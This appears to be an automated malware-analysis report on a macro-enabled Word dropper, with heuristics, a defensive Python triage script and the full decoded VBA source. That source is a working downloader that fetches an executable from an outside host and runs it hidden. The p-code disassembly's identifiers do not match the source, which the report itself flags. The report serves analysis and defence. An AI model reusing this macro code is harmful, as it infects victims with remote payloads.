Verdict: MALICIOUS (risk score 258)
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Word document that uses an enable-macros lure. The embedded VBA project (extracted as 'macros.bas') runs from AutoOpen, declares URLDownloadToFileA from urlmon under an obfuscated name, and downloads a second-stage executable from 'http://golfshoesamerica.com/css/1/c1.exe'. The destination is built as Environ("tmp") & "\" & <URL basename> & ".exe", so the payload lands in %TMP% as c1.exe.exe (double extension), and is then launched with Shell in a hidden window (vbHide).
Heuristics (9)

- Reference to URLDownloadToFile API [critical] (SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API.
- VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL). Matched line in script: `Shell Jawul, vbHide`
- URLDownloadToFile in VBA [critical] (OLE_VBA_DOWNLOAD). Matched line in script (truncated by the analyzer): `Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As LongPtr, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As LongPtr, ByVal c4a430dfaf5343dca7f2601344 …`
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON). Matched line in script: `JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) & ".exe"`
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see Extracted artifacts), so the "no modern VBA project was recovered" clause of this canned description does not apply here; the AutoOpen finding above already covers the auto-execution surface.
- Macro/content-enable lure [medium] (SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://golfshoesamerica.com/css/1/c1.exe (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (labelled "referenced by macro", but this is the standard OOXML DrawingML namespace URI and does not occur in the extracted macro source below; treat it as document-structure noise, not an indicator)
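Static triage of the downloader pattern described in the summary and the heuristics above, as an added example (not the analyzer's output and not oletools code). It takes decoded VBA source such as the macros.bas artifact below, resolves `Declare ... Lib ... Alias` so the URLDownloadToFileA import is recognised under its obfuscated name and checked for an actual call, pulls out URL literals, Shell calls and auto-exec entry points, and re-derives the drop path by emulating the VBA `Environ`/`Mid`/`InStrRev` expression rather than guessing it. The `MACRO_SOURCE` excerpt is constructed from the sample (attribute lines and the 32-bit Declare branch dropped, Declare parameter names shortened), and the %TMP% value is an assumed victim path.

```python
"""Static triage of an Office VBA downloader (added example, not analyzer output).

Operates on decoded VBA source as produced by olevba. MACRO_SOURCE is a
constructed excerpt of the sample's macros.bas: attribute lines and the
32-bit Declare branch are dropped and the Declare's parameter names are
shortened; identifiers and literals are otherwise the sample's own.
"""
import re
from urllib.parse import urlparse

MACRO_SOURCE = r'''
Sub AutoOpen()
Dim f2cc230470d44a01bb95c7a9b6e55a93 As New f50872114f9340d2b22b3df03390a8
Dim jsosoisdisoiosji As String
bcb9c46500c54ec4bd4c503fe5fa4b52 = "http://golfshoesamerica.com/css/1/c1.exe"
JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) & ".exe"
jsosoisdisoiosji = JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
f2cc230470d44a01bb95c7a9b6e55a93.POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds bcb9c46500c54ec4bd4c503fe5fa4b52, JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
sdffdsfdfsdfsdfds898498zerzerez.Likmarhoustaaaan (jsosoisdisoiosji)
End Sub
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr) As LongPtr
Sub POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds(u, f)
SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds 0, u, f, 0, 0
End Sub
Sub Likmarhoustaaaan(Jawul As String)
Shell Jawul, vbHide
End Sub
'''

# Declare statements: local name, library, optional real export name (Alias).
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.I)
URL_RE = re.compile(r'"((?:https?|ftp)://[^"\s]+)"', re.I)
# A Shell statement at line start: command expression and optional window style.
SHELL_RE = re.compile(
    r'^\s*(?:Call\s+)?Shell\s*\(?\s*([^,\n]+?)\s*(?:,\s*(\w+))?\)?\s*$', re.I | re.M)
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|AutoExec|AutoClose|Auto_Open|'
    r'Document_Open|Document_Close|Workbook_Open)\s*\(', re.I | re.M)


def vba_instrrev(s: str, needle: str) -> int:
    """VBA InStrRev: 1-based position of the last occurrence, 0 if absent."""
    return s.rfind(needle) + 1


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(s, start, length): 1-based start, silently truncated at end."""
    return s[start - 1:start - 1 + length]


def drop_path(url: str, tmp: str) -> str:
    """Emulate: Environ("tmp") & "\\" & Mid(url, InStrRev(url, "/") + 1, Len(url)) & ".exe"."""
    return tmp + "\\" + vba_mid(url, vba_instrrev(url, "/") + 1, len(url)) + ".exe"


def triage(src: str, tmp: str = r"C:\Users\victim\AppData\Local\Temp") -> dict:
    """Return IOCs and capability/behaviour evidence from decoded VBA source.

    `tmp` stands in for the victim's %TMP% (assumed value, not from the sample).
    """
    download_api = {}
    for name, lib, alias in DECLARE_RE.findall(src):
        if (alias or name).lower() == "urldownloadtofilea":
            # A Declare is only capability; a call site at line start is behaviour.
            called = re.search(r'^\s*(?:Call\s+)?' + re.escape(name) + r'\b',
                               src, re.I | re.M) is not None
            download_api[name] = {"import": f"{lib}!{alias or name}", "called": called}
    urls = URL_RE.findall(src)
    return {
        "autoexec": AUTOEXEC_RE.findall(src),
        "download_api": download_api,
        "shell_calls": SHELL_RE.findall(src),          # [(command_expr, window_style)]
        "urls": urls,
        "domains": sorted({urlparse(u).hostname for u in urls}),
        "drop_paths": [drop_path(u, tmp) for u in urls],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(MACRO_SOURCE), indent=2))
```

The emulation is what turns the URL into a usable host indicator: the macro appends ".exe" to a basename that already ends in ".exe", so the file to hunt for in %TMP% is c1.exe.exe, not c1.exe. The `called` flag separates a declared-but-unused import (common in benign add-ins) from the actual download in this sample.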
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6792 bytes |

SHA-256 (macros.bas): 224994afea60a5c28c1cc0ae0ee921988fcb8f6c04e959e36d707cb90da48788
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim f2cc230470d44a01bb95c7a9b6e55a93 As New f50872114f9340d2b22b3df03390a8
Dim jsosoisdisoiosji As String
bcb9c46500c54ec4bd4c503fe5fa4b52 = "http://golfshoesamerica.com/css/1/c1.exe"
JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) & ".exe"
jsosoisdisoiosji = JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
f2cc230470d44a01bb95c7a9b6e55a93.POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds bcb9c46500c54ec4bd4c503fe5fa4b52, JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
sdffdsfdfsdfsdfds898498zerzerez.Likmarhoustaaaan (jsosoisdisoiosji)
End Sub
Attribute VB_Name = "f50872114f9340d2b22b3df03390a8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If Win64 Then
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As LongPtr, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As LongPtr, ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As Long, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As Long, ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As Long) As Long
#End If
Sub POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds(JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91)
SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds 0, JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91, 0, 0
End Sub
Attribute VB_Name = "sdffdsfdfsdfsdfds898498zerzerez"
Sub Likmarhoustaaaan(Jawul As String)
Shell Jawul, vbHide
End Sub
```
The extractor appended a p-code disassembly of the three module streams. Its identifier names do not line up with the decompressed source above (the entry point appears as `bcb9c46500c54ec4bd4c503fe5fa4b52` rather than `AutoOpen`, and the imported library as "Shell" rather than "urlmon"), while the string literals ("http://golfshoesamerica.com/css/1/c1.exe", "tmp", "\", "/", ".exe"), the five-argument call with two zero-padded leading and trailing arguments, and the call sequence agree with the source. Office executes the p-code when its VBA version matches the document's, so base the behavioural verdict on the p-code and treat the source text as corroboration; when names disagree like this, re-disassemble with a p-code tool before attributing anything to the source stream alone.

```vb
' Processing file: /opt/analyzer/scan_staging/ab37ac693047480d9888b3d695dfcc08.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2750 bytes
' Line #0:
' FuncDefn (Sub bcb9c46500c54ec4bd4c503fe5fa4b52())
' Line #1:
' Dim
' VarDefn JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 (New As Environ)
' Line #2:
' Dim
' VarDefn InStrRev (As String)
' Line #3:
' LitStr 0x0028 "http://golfshoesamerica.com/css/1/c1.exe"
' St POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Line #4:
' LitStr 0x0003 "tmp"
' ArgsLd Likmarhoustaaaan 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' LitStr 0x0001 "/"
' ArgsLd SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds 0x0002
' LitDI2 0x0001
' Add
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' FnLen
' ArgsLd Mid 0x0003
' Concat
' LitStr 0x0004 ".exe"
' Concat
' St sdffdsfdfsdfsdfds898498zerzerez
' Line #5:
' Ld sdffdsfdfsdfsdfds898498zerzerez
' St InStrRev
' Line #6:
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Ld sdffdsfdfsdfsdfds898498zerzerez
' Ld JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
' ArgsMemCall c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 0x0002
' Line #7:
' Ld InStrRev
' Paren
' Ld a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9
' ArgsMemCall f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 0x0001
' Line #8:
' EndSub
' Macros/VBA/f50872114f9340d2b22b3df03390a8 - 3187 bytes
' Line #0:
' LbMark
' Ld Project
' LbIf
' Line #1:
' FuncDefn (Private Declare PtrSafe Function ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 Lib "Shell" (ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As LongPtr, ByVal urlmon As String, ByVal JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448 As String, ByVal f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91 As LongPtr, ByVal Jawul As LongPtr) As LongPtr)
' Line #2:
' LbMark
' LbElse
' Line #3:
' FuncDefn (Private Declare PtrSafe Function ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 Lib "Shell" (ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As Long, ByVal urlmon As String, ByVal JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448 As String, ByVal f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91 As Long, ByVal Jawul As Long) As Long)
' Line #4:
' LbMark
' LbEndIf
' Line #5:
' FuncDefn (Sub c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1(vbHide, Document))
' Line #6:
' LitDI2 0x0000
' Ld vbHide
' Ld Document
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 0x0005
' Line #7:
' EndSub
' Line #8:
' Macros/VBA/sdffdsfdfsdfsdfds898498zerzerez - 1339 bytes
' Line #0:
' FuncDefn (Sub f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597(Class As String))
' Line #1:
' Ld Class
' Ld _B_var_Environ
' ArgsCall _B_var_bcb9c46500c54ec4bd4c503fe5fa4b52 0x0002
' Line #2:
' EndSub
```